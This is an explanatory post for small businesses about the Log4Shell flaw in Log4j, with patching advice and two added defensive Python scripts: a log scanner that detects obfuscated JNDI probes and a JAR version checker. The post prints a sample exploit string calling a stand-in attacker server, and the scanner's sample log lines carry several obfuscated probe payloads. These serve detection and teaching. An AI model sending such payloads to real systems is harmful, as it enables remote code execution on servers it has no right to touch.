Unless you are in the IT industry, the news of a worldwide massive security vulnerability that has just been discovered may have passed you by last weekend.
The problem is that this particular vulnerability has immense potential ramifications and has had IT teams around the globe racing against hackers to try to patch the problem.
What is the problem?
The software that runs our business applications, servers and other apps uses code. In many cases, this code draws on what is known as open-source code that developers have made available for free for other developers to use.
Rather than reinvent the wheel, developers pull this open-source code into their own programs as a ready-made library, sometimes copying and tweaking it along the way.
When this code is particularly useful, you may see it appear in millions of pieces of software, hardware and systems.
It works brilliantly until a vulnerability is discovered in that shared code, because every product that embedded it inherits the flaw, and hackers can then use it to get into the software, hardware and systems that contain it.
What is Log4J?
In this situation, the open-source code is the catchily named Log4j, a logging library for programs written in Java.
Logging code records what is happening inside a program or system. These logs are how you keep an eye on whether things are running smoothly and work out what triggered a particular error.
Log4j is one of the most popular open-source logging libraries around. The widely quoted figure of 3 billion (yes, billion with a b) devices is really Oracle's count of devices that run Java, the language Log4j is written for, so it is an upper bound rather than a count of vulnerable systems; nobody has an exact number, but Log4j turns up in a very large share of Java software.
It is used in many business programs, applications, cloud services and web servers. It is also found inside security devices, software on PCs and Macs, mobile apps, network devices, cloud hosting platforms and Internet of Things tech such as smart devices.
What is the vulnerability?
The vulnerability was publicly disclosed on 9 December 2021. It lets an attacker run code of their choice on any server or program that logs text using Log4j, without logging in first. Because the attacker never goes through a login at all, multifactor authentication and the other controls built around logging in do not help. The flaw itself is that Log4j treats certain patterns of the form "${...}" inside the text it is asked to log as instructions rather than plain text: a pattern like "${jndi:ldap://attacker-server/x}" makes the program contact the attacker's server and load code from it. All the attacker has to do is get that text into something the program logs, such as a web request header, a username or a chat message.
Once in, the attacker can install malware or ransomware, read or change any file the compromised program can reach, or plant backdoors for later access.
The vulnerability has been named Log4Shell for ease of reference and carries the maximum CVSS score of 10.0, rated critical (CVE-2021-44228). It affects Log4j version 2 from 2.0-beta9 up to and including 2.14.1. The first fix, 2.15.0, turned out to be incomplete, so the version to aim for is 2.16.0 or later. The older Log4j 1.x line is not affected by this particular flaw (it lacks the lookup feature), although it is long out of support. The ACSC has listed the alert status as critical.
Is there a fix for the vulnerability?
While a patch has been issued to fix the vulnerability, fixing it is not straightforward. The code is buried deep in programs developed by thousands of vendors. Each individual program, device, and system will need to be identified, and the patch applied.
How big a task is that?
Look around your desk in your office. How many pieces of tech can you see? Now open your computer and your phone. How many programs and applications do you have loaded? What about the programs that form part of the operating system?
Next, look at your website. Where does it live? What software does it run on?
Any one of these could be using Log4j. Now multiply that by each person in your organisation.
In a large enterprise, this is a mammoth undertaking with a complex web of legacy IT systems with modern pieces bolted on.
What is happening to fix the issue?
Every IT team, IT company, hosting company, and software company is scrambling to identify all the places where that piece of software code has been used and work out how to apply the patches.
In most cases it will be up to the individual vendor to patch its software and then push the patch out to businesses to apply, but that could take months, which leaves the business exposed in the meantime.
Cybersecurity teams within businesses are working around the clock trying to identify how the vulnerability will be exploited and trying to put in monitoring to spot any threats, and barriers to stop the bad guys before they get too far into the systems.
The added challenge is that this vulnerability is ridiculously easy to exploit. Anyone who can copy and paste can exploit this vulnerability, so it is being used by not only highly skilled hackers or state actors but also novice hackers commonly known as “script kiddies.”
What has been seen in the past few days is mostly cryptominers and automated botnets leveraging the vulnerability. It is only a matter of time before more damaging attacks follow, including ransomware and worms that compromise hosts so that access to them can be sold to the highest bidder.
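As an added example (not part of the original article), here is a small Python script of the kind a security team might run over web-server access logs to spot Log4Shell probes. The log lines are constructed for the demonstration and the attacker addresses are from documentation ranges. The normalisation step undoes the three obfuscation tricks that were common in the first days (URL encoding, "${lower:...}"/"${upper:...}" wrappers and the "${...:-default}" fallback syntax); other lookup tricks exist, so this is a starting point for monitoring rather than a complete detector.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system). The last
# three carry Log4Shell probes in increasingly obfuscated forms.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +1100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +1100] "GET /about HTTP/1.1" 200 2048 "-" "curl/7.79.1"',
    '203.0.113.7 - - [11/Dec/2021:10:02:15 +1100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.8 - - [11/Dec/2021:10:02:19 +1100] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.8/x} HTTP/1.1" 400 0 "-" "-"',
    '203.0.113.9 - - [11/Dec/2021:10:02:33 +1100] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/z}"',
]

# A lookup with no further "${" inside it, i.e. the innermost one.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the wrappers are peeled away.
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(body):
    """Resolve the lookups attackers use purely for obfuscation.

    Returns the literal text the lookup evaluates to, or None when the
    lookup is not one of the three handled forms (a real ${jndi:...}
    lookup, for instance, is left untouched so it can be reported).
    """
    if ":-" in body:                  # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    low = body.lower()
    if low.startswith("lower:"):      # ${lower:J} -> j
        return body[6:].lower()
    if low.startswith("upper:"):      # ${upper:j} -> J
        return body[6:].upper()
    return None


def normalize(text, max_rounds=20):
    """URL-decode the line, then repeatedly collapse innermost obfuscation
    lookups until nothing changes (bounded so hostile input cannot loop)."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(substitute, text)
        if not changed:
            break
    return text


def find_log4shell(lines):
    """Return (line_index, de-obfuscated payload) for every JNDI lookup found."""
    findings = []
    for index, line in enumerate(lines):
        for match in JNDI.finditer(normalize(line)):
            findings.append((index, match.group(0)))
    return findings


if __name__ == "__main__":
    for index, payload in find_log4shell(SAMPLE_LOG_LINES):
        print(f"line {index}: {payload}")
```

The point of the normalisation step is that matching the literal string "${jndi:" catches only the laziest probes; the two obfuscated samples above slip past such a rule but are reduced to the same "${jndi:ldap://...}" form before matching.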
This is a race against time, but it may take up to a year before the most vulnerable pieces of software/system are identified and patched.
How Bad is Log4Shell?
There is no complete list of every company that is affected. Just a few of the companies that have been reported as being impacted include Microsoft, Amazon Web Services, Cisco, cPanel, Dell, Google Cloud, Minecraft, RSA, Salesforce, SAP (some products), Apple iCloud, Tesla, Twitter, Steam, Sophos, TP-Link and VMware.
“The internet’s on fire right now,” said Adam Meyers, senior vice president of intelligence at the cybersecurity firm CrowdStrike. “People are scrambling to patch, and there are script kiddies and all kinds of people scrambling to exploit it.”
“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare.
The bottom line is that while the patches are being rolled out, there will be a load of data breaches, malware attacks, ransomware attacks and credit card scraping by malicious actors.
As a small business owner/individual, what do you need to do?
Most of the initial work to fix the vulnerability needs to be done by your hardware and software providers.
Your role is to apply each of the patches as they come through for the things you use, and to protect your environment as best you can in the meantime.
- Patch. Patch. Patch. Check for updates for all your systems and apps daily and make sure every update is run. While Microsoft is good at helping you find patches for its own products, Windows Update will not fix a vulnerable Log4j bundled inside a third-party Java application on your machine; that patch has to come from the application's vendor, so check other hardware and software manually.
- If you have your own server for your business, get a competent IT company to assist you in getting all patches applied as soon as they become available. This is not something that you can leave for later – all patches need to be applied within 24 hours.
- Backups. Have solid and reliable backups for all your systems and information, and keep at least one copy offline or otherwise out of reach of the systems it backs up, because ransomware goes after backups too.
- Boost your firewall. Talk with a cybersecurity or IT company about setting up and configuring a firewall that mitigates attacks. A web application firewall can block many of the known exploit strings, but attackers disguise them easily, so treat it as a speed bump rather than a fix. Blocking outbound LDAP and RMI connections from servers that have no business making them is more robust, since that outbound connection is how the exploit fetches its payload.
- Antivirus. Keep your antivirus and anti-malware programs constantly updated, as many vendors are releasing additional signatures to mitigate the risks.
- Update your routers (including your home routers) as patches become available.
- If you have custom or in-house software developed for your business, have it reviewed to ensure that it does not contain Log4j, including the libraries it pulls in, since Log4j is usually brought in indirectly by some other library rather than added deliberately.
- Alerts. Assume that your personal details will be breached somewhere along the line. Sign up for a service like Have I Been Pwned to get an alert if any of your details are leaked.
- Prepare your response to a breach. The likelihood that your business systems will be breached has increased, so review the guidelines from the ACSC about what to do if your systems are breached, and plan your response now (rather than when you are in the thick of a problem).
- Keep a close eye on all bank transactions to ensure there are no unaccounted-for transactions, and regularly audit larger or high-volume transactions, as attackers who get in through this flaw may silently set up automatic payments on your systems.
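Finding where Log4j is hiding, which both the earlier passage on identifying every affected program and the point above on reviewing in-house software call for, is mostly a matter of looking inside Java archives. As an added example (not from the original article and not an official Apache tool), the Python script below walks a directory, opens every .jar, reads the version that Maven records in log4j-core's pom.properties, and checks whether the JndiLookup class (the component that makes Log4Shell possible, and which some vendors removed as an interim fix) is present. The JARs it scans are constructed in a temporary directory for the demonstration. The version thresholds are the ones the article gives (2.0-beta9 to 2.14.1 affected, 2.16.0 fixed), plus the fact that 2.15.0's fix was incomplete.

```python
import os
import re
import tempfile
import zipfile

# Where Maven-built log4j-core JARs record their version, and the class whose
# presence makes the JNDI lookup (the Log4Shell trigger) available.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 2, 0); '2.0-beta9' -> (2, 0, 0, 0, 9).

    The fourth field ranks pre-releases (beta < rc < final) so that
    2.0-beta9 < 2.0-rc1 < 2.0 compares correctly as tuples."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, pre, pre_num = m.groups()
    rank = {"beta": 0, "rc": 1, None: 2}[pre]
    return (int(major), int(minor), int(patch or 0), rank, int(pre_num or 0))


AFFECTED_MIN = parse_version("2.0-beta9")   # first affected release
FIRST_FIX = parse_version("2.15.0")         # first fix, later found incomplete
FIXED_MIN = parse_version("2.16.0")         # the release the article names as the fix


def classify(version, has_jndi_class):
    """Status string for one JAR, or None if it is not log4j-core at all."""
    if version is None:
        return "UNKNOWN VERSION, contains JndiLookup.class" if has_jndi_class else None
    v = parse_version(version)
    if v < AFFECTED_MIN:
        return "not in affected range"
    if v >= FIXED_MIN:
        return "FIXED"
    if not has_jndi_class:
        return "MITIGATED (JndiLookup.class removed)"
    if v >= FIRST_FIX:
        return "UPGRADE REQUIRED (2.15.0 fix incomplete)"
    return "VULNERABLE (CVE-2021-44228)"


def read_jar(path):
    """Return (version or None, whether JndiLookup.class is present)."""
    version = None
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if POM_PROPS in names:
            for line in jar.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_CLASS in names


def scan(root):
    """Walk root for .jar files and report each one that is, or bundles, log4j-core.
    Nested JARs inside WAR/EAR files and Log4j 1.x (different pom path) are not handled."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                version, has_jndi = read_jar(path)
            except zipfile.BadZipFile:
                continue                       # not a real archive; skip it
            status = classify(version, has_jndi)
            if status is not None:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = status
    return results


def build_sample_jars(root):
    """Write constructed JARs (plain zip files with placeholder contents) that
    imitate what a scan of a real install directory would encounter."""
    def jar(relpath, version=None, jndi=True):
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as z:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            if version:
                z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode
    jar("lib/log4j-core-2.14.1.jar", "2.14.1")
    jar("lib/log4j-core-2.14.1-stripped.jar", "2.14.1", jndi=False)
    jar("lib/log4j-core-2.15.0.jar", "2.15.0")
    jar("lib/log4j-core-2.16.0.jar", "2.16.0")
    jar("lib/log4j-core-2.0-beta8.jar", "2.0-beta8")
    jar("app/myapp-all.jar")                   # shaded app JAR: no pom, but JndiLookup inside
    jar("app/other-lib.jar", jndi=False)       # unrelated library, should not be reported


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_jars(root)
        return scan(root)


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:45} {path}")
```

Point scan() at an application's install directory (or a whole server) to get the same report for real JARs. The "UNKNOWN VERSION" case matters most in practice: vendors often repackage their dependencies into one large JAR with no version metadata, and the only reliable sign is the class itself.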
Finally, be kind to your IT people and companies that you use.
Good ones will be across this problem and will be working long hours and proactively communicating with you about your risks and how to mitigate them. Of course, if you hear nothing from the IT companies that you use, then you may choose to draw your own conclusions about their competence.
For my website maintenance clients, I have already been in touch with the hosting companies that we recommended to you to check their response to the issue. They have either disabled the vulnerable component within your cPanel while they assess whether the patch will impact your site, or have already updated with the latest patch. WordPress, themes and plugins generally do not run Java, so they are not affected.